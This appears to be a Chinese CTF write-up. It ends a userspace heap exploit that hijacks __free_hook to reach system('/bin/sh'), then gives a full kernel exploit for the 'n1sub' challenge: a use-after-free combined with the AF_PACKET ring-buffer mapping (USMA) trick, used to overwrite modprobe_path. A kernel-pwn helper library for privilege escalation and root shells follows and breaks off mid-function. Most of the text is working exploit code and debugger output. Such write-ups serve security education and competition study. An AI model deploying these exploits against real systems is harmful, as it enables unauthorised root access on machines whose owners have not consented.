success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base+libc.sym["__free_hook"]
system = libc_base+libc.sym["system"]
binsh = libc_base+next(libc.search(b"/bin/sh"))
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

payload = type_atom(0x100, [0]*0x100) + name_atom(b"1\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"3\x00") + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"1\x00")
dele(b"2\x00")
dele(b"3\x00")

data = (free_hook >> 8) & 0xffffffff
edit(b"1111\x00",0x100-2,data)
data = (free_hook >> 40) & 0xffffffff
edit(b"1111\x00",0x100-1,data)
data = (free_hook & 0xff) * 0x1000000
edit(b"1111\x00",0x100-3,data)

payload = type_atom(0x100, [0]*0x100) + name_atom(b"a"*0x10+b";/bin/sh\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(p64(system)) + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"a"*0x10+b";/bin/sh\x00")

p.interactive()

n1sub

1
2
~ $ cat /proc/version 
Linux version 6.1.58 (chuj@pwn-host.nixos) (gcc (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #1 SMP PREEMPT_DYNAMIC Mon Oct 16 12:23:54 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
qemu-system-x86_64 \
-m 512M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-append 'console=ttyS0 kaslr quiet loglevel=3 oops=panic panic=-1' \
-netdev user,id=net \
-device e1000,netdev=net \
-no-reboot \
-monitor /dev/null \
-cpu qemu64,+smep,+smap \
-smp cores=2,threads=1 \
-nographic -s
  • smep,smap,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs none /tmp
mount -t devtmpfs none /dev
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
insmod /sub.ko
chmod 666 /dev/n1sub
setsid /bin/cttyhack setuidgid 1000 /bin/sh #normal user
umount /proc
umount /sys
poweroff -d 0 -f

题目给了配置文件,有些内核保护并没有开启:

1
2
3
4
# CONFIG_MEMCG is not set /* 关闭内存控制器(GFP_KERNEL和GFP_ACCOUNT之间没有隔离) */
# CONFIG_SLAB_FREELIST_RANDOM is not set /* 关闭slab freelist随机化 */
# CONFIG_SLAB_FREELIST_HARDENED is not set
# CONFIG_SLUB_STATS is not set

漏洞分析

UAF 漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
if ( cmd == 0xDEADBEE1 )                      // dele
{
if ( arg > 2 )
goto LABEL_4;
if ( !bufs_free[arg] )
{
kfree(bufs[arg]);
bufs_free[arg] = 1;
}
raw_spin_unlock(&ioctl_lock);
return 0;
}

USMA 用户态映射攻击

在 Linux 内核中的 packet socket 模块可以让用户在设备驱动层接收和发送 raw packets，并且为了加速数据报文的拷贝，它允许用户创建一块与内核态共享的环形缓冲区：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • pg_vec 实际上是一个保存着连续物理页的虚拟地址的数组,而这些虚拟地址会被 packet_mmap 函数所使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page); /* 将内存页插入到用户态的虚拟地址空间中 */
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}
  • packet_mmap 将这些内核虚拟地址代表的物理页映射进用户态,这样普通用户就能在用户态对这些物理页直接进行读写
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int vm_insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page)
{
if (addr < vma->vm_start || addr >= vma->vm_end)
return -EFAULT;
if (!page_count(page))
return -EINVAL;
if (!(vma->vm_flags & VM_MIXEDMAP)) {
BUG_ON(mmap_read_trylock(vma->vm_mm));
BUG_ON(vma->vm_flags & VM_PFNMAP);
vma->vm_flags |= VM_MIXEDMAP;
}
return insert_page(vma, addr, page, vma->vm_page_prot);
}
EXPORT_SYMBOL(vm_insert_page);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static int insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page, pgprot_t prot)
{
struct mm_struct *mm = vma->vm_mm;
int retval;
pte_t *pte;
spinlock_t *ptl;

retval = validate_page_before_insert(page);
if (retval)
goto out;
retval = -ENOMEM;
pte = get_locked_pte(mm, addr, &ptl);
if (!pte)
goto out;
retval = insert_page_into_pte_locked(mm, pte, addr, page, prot);
pte_unmap_unlock(pte, ptl);
out:
return retval;
}
1
2
3
4
5
6
7
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}
  • 检查 page 是否为匿名页,是否为 Slab 子系统分配的页,以及 page 是否含有 type
  • 内存页的 type 总共有以下几种:
1
2
3
4
5
#define PG_buddy	0x00000080	/* 伙伴系统中的页 */
#define PG_offline 0x00000100 /* 为内存交换出去的页 */
#define PG_kmemcg 0x00000200 /* 为kmemcg使用 */
#define PG_table 0x00000400 /* 作为页表的页 */
#define PG_guard 0x00000800 /* 作为内存屏障的页 */

通过如下函数快速的创建一个 AF_PACKET 协议的原始套接字:

1
socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); /* AF_PACKET是原始套接字协议,是一种特殊的套接字协议,可以是数据链路层原始套接字 */
1
2
int version = TPACKET_V3;
setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)); /* 设置当前AF_PACKET套接字协议版本为TPACKET_V3 */
1
2
3
4
5
6
7
8
9
10
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_block_size = block_size;
req3.tp_block_nr = block_nr;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = frame_nr;
req3.tp_retire_blk_tov = retire_blk_tov;
req3.tp_sizeof_priv = 0;
req3.tp_feature_req_word = 0;
setsockopt(recv_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3)); /* 创建ring buffer(pg_vec) */

入侵思路

有 UAF 漏洞,但是 size 是随机的:

1
2
size = (unsigned int)get_random_u32() % 0x7B0 + 0x68;
sub_offset = ((unsigned int)get_random_u32() % (size - 0x50) + 0x50) & 0xFFFFFFF8;
  • size ∈ [0x68, 0x817]（get_random_u32() % 0x7B0 最大为 0x7AF，再加上 0x68）
  • sub_offset ∈ [0x50, size - 1]，并且会被 & 0xFFFFFFF8 向下对齐到 8 字节

此时需要使用 USMA(用户态映射攻击)

具体思路就是先申请一个 chunk 并读取 sub_size,释放后根据 sub_size 的大小来创建一个与之匹配的 ring buffer(pg_vec),由于程序没有开 slab freelist 随机化,因此这个 UAF 大概率会命中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   save_status();
bind_core(0);
unshare_setup();
fd = open("/dev/n1sub", O_RDWR);
if (fd < 0)
err_exit("open /dev/n1sub");

int socket_list[0x100];
for (int i = 0; i < 0x80; i++)
socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

sub_size = add();
printf("sub_size: 0x%x\n",sub_size);
printf("sub_offset: 0x%x\n",sub_offset);
int block_nr = sub_size / 0x8;
dele(0);

int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

内核模块会以 sub_offset 为偏移来修改 ring buffer(pg_vec) 中的数据(连续物理页的虚拟地址),导致程序映射到非预期的内存空间

  • 当程序执行 mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0) 进行映射时,函数 packet_mmap 会将 ring buffer(pg_vec) 中的各个物理页映射给用户态程序(表现为一个大内存块)
  • 另外 validate_page_before_insert 函数会进行检查：匿名页（PageAnon）、slab 分配器使用的页（PageSlab）以及带有 type 的页（例如仍在伙伴系统中的空闲页带有 PG_buddy，页表页带有 PG_table）都会返回 -EINVAL，这导致通常情况下可以用于泄露的物理页（大多是 slab 页）没法成功映射

之后我们可以通过 sub_offset 来定位非预期物理页的位置,进而打印出非预期的数据

这里的内存扫描有点困难,需要一个可以用于泄露或者劫持程序流程的物理页:

  • 用于泄露的内存页:先关闭内核地址随机化,再打印指针即可
  • 劫持程序的内存页:尝试覆盖指针,看看是否会引发段错误

这里我参考了网上 wp 的方法:先断点到 kfree(bufs[arg]),尝试查找 bufs 所在的内存页

1
2
3
4
5
6
7
8
pwndbg> search -t qword 0xffff888004e12000
Searching for value: b'\x00 \xe1\x04\x80\x88\xff\xff'
<pt> 0xffff888004844358 0xffff888004e12000
<pt> 0xffff888004cc3370 0xffff888004e12000 /* target */
<pt> 0xffff888004d5ad98 0xffff888004e12000
<pt> 0xffff888004e12570 0xffff888004e12000
<pt> 0xffffc90000217d98 0xffff888004e12000
<pt> 0xffffffffc0002370 0xffff888004e12000 /* target */
  • 打印 0xffffffffc0002370 所在内存页
1
2
3
4
5
6
7
pwndbg> telescope 0xffffffffc0002000
00:00000xffffffffc0002000 ◂— 0x0
01:00080xffffffffc0002008 —▸ 0xffffffff8293d8c0 ◂— 0xffffffffc0002008
02:00100xffffffffc0002010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:00180xffffffffc0002018 ◂— 0x627573 /* 'sub' */
04:00200xffffffffc0002020 ◂— 0x0
... ↓ 3 skipped
1
2
3
4
5
6
7
pwndbg> telescope 0xffff888004cc3000
00:00000xffff888004cc3000 ◂— 0x0
01:00080xffff888004cc3008 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
02:00100xffff888004cc3010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:00180xffff888004cc3018 ◂— 0x627573 /* 'sub' */
04:00200xffff888004cc3020 ◂— 0x0
... ↓ 3 skipped
  • 此时我们可以发现 0xffff888004cc3000 和 0xffffffffc0002000 都映射了内核模块的 bss 段

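对于 0xffffffffc0002000（模块映射区中的地址）我们是控制不了的，但 0xffff888004cc3000 位于内核的直接映射区（direct mapping，起始于 page_offset_base = 0xffff888000000000），该区域线性映射了全部物理内存，所以 bss 段所在的物理页在这里还有一个别名地址；这个物理页既不是 slab 页也不带 type，可以通过 validate_page_before_insert 的检查，这就导致了我们可以把它映射到用户态并直接控制 bss 段上的地址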

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
uint64_t *unexpected_page;
int index;
while (1)
{
for (uint64_t i = 0; i < PAGE_SIZE; i++)
edit(0);

char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
if ((uint64_t)page == -1)
continue;

print_hex(page, 0x100);
unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
if (unexpected_page[0x3] == 0x0000000000627573){
puts("find target");
break;
}

munmap(page, PAGE_SIZE * block_nr);
if (index++ > 0x200){
err_exit("UAF error");
}
}

控制 bss 段上的地址,配合内核模块实现的功能就可以任意写(只能减少)

接下来最简单的提权方法就是修改 modprobe_path（将 /sbin/modprobe 修改为 /tmp//modprobe）

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

#include "kernelpwn.h"
#define PAGE_SIZE 0x1000

int fd;
/* Single-word argument wrapper; nothing in the visible exploit code
 * references this type (the ioctl helpers pass plain ints/pointers). */
struct argg {
size_t data;
};

uint32_t sub_size, sub_offset;

/*
 * Send request 0xDEADBEE0 to the driver, passing the address of the global
 * sub_offset. The ioctl() result is returned unchanged; main() stores it as
 * sub_size (presumably the size of the buffer the module just allocated,
 * with sub_offset filled in by the module -- confirm against sub.ko).
 */
int add(){
    const unsigned long request = 0xDEADBEE0;
    int rc = ioctl(fd, request, &sub_offset);

    return rc;
}

/*
 * Send request 0xDEADBEE1 (the module's "dele" branch, which kfree()s
 * bufs[index] for index <= 2) and return the raw ioctl() result.
 */
int dele(int index){
    const unsigned long request = 0xDEADBEE1;
    int rc = ioctl(fd, request, index);

    return rc;
}

/*
 * Send request 0xDEADBEE2 for buffer `index` and return the raw ioctl()
 * result. NOTE(review): the handler is not shown here; the write-up describes
 * it as a decrement-only write at bufs[index] + sub_offset -- confirm.
 */
int edit(int index){
    const unsigned long request = 0xDEADBEE2;
    int rc = ioctl(fd, request, index);

    return rc;
}

/*
 * Exploit driver for /dev/n1sub.
 *
 * Flow, as far as the code below shows:
 *   1. allocate a driver buffer (add), remember its size/offset, free it (dele);
 *   2. create a TPACKET_V3 ring with sub_size / 8 blocks so that its pg_vec
 *      array is the same size as the freed buffer;
 *   3. repeatedly call edit(0) and mmap() the ring until the page selected by
 *      sub_offset carries the module's "sub" marker at qword 3;
 *   4. derive kernel_base / modprobe_path from qword 0xF of that page, redirect
 *      qword 0x6E and use edit(0) to patch modprobe_path byte by byte;
 *   5. run a file with an invalid magic to make the kernel call modprobe.
 *
 * argc/argv/envp are unused.
 */
int main(int argc, char** argv, char** envp){
    save_status();
    bind_core(0);
    unshare_setup();
    fd = open("/dev/n1sub", O_RDWR);
    if (fd < 0)
        err_exit("open /dev/n1sub");

    /* 0x80 single-page rings created up front; the fds are never used again
     * (presumably heap grooming -- confirm) */
    int socket_list[0x100];
    for (int i = 0; i < 0x80; i++)
        socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

    sub_size = add();
    printf("sub_size: 0x%x\n",sub_size);
    printf("sub_offset: 0x%x\n",sub_offset);
    /* one pg_vec entry is 8 bytes, so this many blocks gives a pg_vec of
     * sub_size bytes */
    int block_nr = sub_size / 0x8;
    dele(0);

    int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

    uint64_t *unexpected_page;
    /* retry counter: must start at 0, it was previously read uninitialized */
    int index = 0;
    while (1)
    {
        /* PAGE_SIZE edits per round, i.e. the edited value moves by one page
         * if each edit changes it by one -- TODO confirm against the module */
        for (uint64_t i = 0; i < PAGE_SIZE; i++)
            edit(0);

        char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
        if (page == MAP_FAILED)
            continue;

        print_hex(page, 0x100);
        /* pg_vec entry number sub_offset / 8 is the one the driver edited;
         * each entry maps one page of the user view */
        unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
        /* 0x627573 == "sub": marker seen at +0x18 of the module page */
        if (unexpected_page[0x3] == 0x0000000000627573){
            puts("find target");
            break;
        }

        munmap(page, PAGE_SIZE * block_nr);
        if (index++ > 0x200){
            err_exit("UAF error");
        }
    }

    uint64_t kernel_base = unexpected_page[0xF] - 0x1851720;
    uint64_t modprobe_path = kernel_base + 0x1852420;

    printf("kernel_base: 0x%lx\n", kernel_base);
    printf("modprobe_path: 0x%lx\n", modprobe_path);

    /*
     * Number of edit(0) calls to apply at modprobe_path + i. Entry 0 is a
     * placeholder: byte 0 ('/') is not touched. Presumably each edit
     * decrements the target by one with borrows carrying into the next byte,
     * turning "/sbin" into "/tmp/" -- confirm against the module.
     * The loop is bounded by the table size; the old "i <= 0x5" bound read
     * one element past the end of the array.
     */
    uint32_t difference[] = {0, 0xFF, 0xF4, 0xF8, 0x3E};
    for (size_t i = 1; i < sizeof(difference) / sizeof(difference[0]); i++){
        /* qword 0x6E (byte offset 0x370) is the slot that held the buffer
         * pointer in the gdb search; point it at the byte to patch */
        unexpected_page[0x6E] = modprobe_path - sub_offset + i;

        for (uint32_t j = 0; j < difference[i]; j++)
            edit(0);
    }

    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("echo '#!/bin/sh\nchmod 777 /flag' > /tmp/modprobe");
    system("chmod +x /tmp/modprobe");
    system("chmod +x /tmp/dummy");

    system("/tmp/dummy");
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

/*
 * Translate a direct-map address into the address of its vmemmap entry.
 * The address is rounded down to a 0x1000 boundary, turned into a page index
 * relative to page_offset_base, and that index selects a 0x40-byte slot above
 * vmemmap_base (0x40 is presumably sizeof(struct page) -- confirm for the
 * target kernel).
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_aligned = direct_map_addr & (~0xfff);
    size_t page_index = (page_aligned - page_offset_base) >> 12;

    return vmemmap_base + (page_index << 6);
}

/*
 * Hex-dump `size` bytes starting at `p` to stdout, one row per pointer-sized
 * step: offset, eight individual bytes, then the same memory as one word.
 *
 * Returns 1 without printing anything when `size` is not a multiple of
 * sizeof(void *), 0 otherwise.
 *
 * Each row always prints eight bytes, so on a target where sizeof(void *) is
 * not 8 the rows would overlap; the helper is written for 64-bit builds.
 */
int print_hex(void *p, int size){
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if (size % sizeof(void *))
    {
        return 1;
    }
    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += sizeof(void *)){
        unsigned long word;

        /* copy instead of dereferencing a casted pointer: the buffer may be
         * unaligned and is not an unsigned long object */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
               i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], word);
    }
    return 0;
}

/*
 * Print `msg` behind a red/bold "[x] Error at: " banner on stdout, wait five
 * seconds so the message stays readable, then terminate with EXIT_FAILURE.
 * Never returns.
 */
void err_exit(char *msg)
{
    fprintf(stdout, "\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);

    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Root check followed by a shell.
 * If getuid() is non-zero the failure banner is printed and, after a
 * five-second pause, the process exits with EXIT_FAILURE. Otherwise /bin/sh
 * is started through system() and the process exits with EXIT_SUCCESS once
 * the shell returns. Never returns to the caller.
 */
void get_root_shell(void)
{
    uid_t current_uid;

    puts("[*] Checking for root...");

    current_uid = getuid();
    if (current_uid != 0) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* leave through exit() so the process ends cleanly rather than by
     * returning into whatever called us */
    exit(EXIT_SUCCESS);
}

/*
 * Userspace register snapshot.
 * save_status() copies the current cs, ss and rsp into user_cs, user_ss and
 * user_sp, and stores the flags register in user_rflags via pushf/pop.
 * No reader of these globals is visible in this part of the file; presumably
 * they are used to build a return-to-userland frame -- confirm at the callers.
 */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
/* The operands are written destination-first (Intel syntax), so this is
 * presumably built with -masm=intel -- confirm the build flags. */
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/*
 * Restrict the process identified by getpid() to the single CPU `core` with
 * sched_setaffinity(), then print a confirmation line. The result of
 * sched_setaffinity() is not checked, so the message is printed either way.
 */
void bind_core(int core)
{
    cpu_set_t only_this_core;

    CPU_ZERO(&only_this_core);
    CPU_SET(core, &only_this_core);

    pid_t self = getpid();
    sched_setaffinity(self, sizeof(only_this_core), &only_this_core);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * ret2usr helper: treats the two integers as the addresses of functions and
 * evaluates commit_creds(prepare_kernel_cred(NULL)).
 *
 * prepare_kernel_cred: address called as  void *(*)(void *)
 * commit_creds:        address called as  int (*)(void *)
 */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
    typedef void *(*prepare_fn)(void *);
    typedef int (*commit_fn)(void *);

    prepare_fn make_cred = (prepare_fn) prepare_kernel_cred;
    commit_fn install_cred = (commit_fn) commit_creds;
    void *new_cred = make_cred(NULL);

    install_cred(new_cred);
}

/**
 * @brief move the calling process into new mount, user and network namespaces
 * and map its original uid/gid to 0 inside the new user namespace.
 *
 * note that the caller **SHOULD NOT** be used to get the root, but an operator
 * to perform basic exploiting operations in it only
 *
 * Best effort: if unshare() fails a diagnostic is printed and the function
 * returns; /proc files that cannot be opened are skipped.
 */
void unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;
    /*
     * Read the ids BEFORE unshare(): once inside the new, still unmapped user
     * namespace getuid()/getgid() report the overflow id, and a map line built
     * from that value is rejected by the kernel.
     */
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("[x] unshare");
        return;
    }

    /* setgroups must be denied before an unprivileged gid_map write */
    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    if (tmp_fd >= 0) {
        write(tmp_fd, "deny", strlen("deny"));
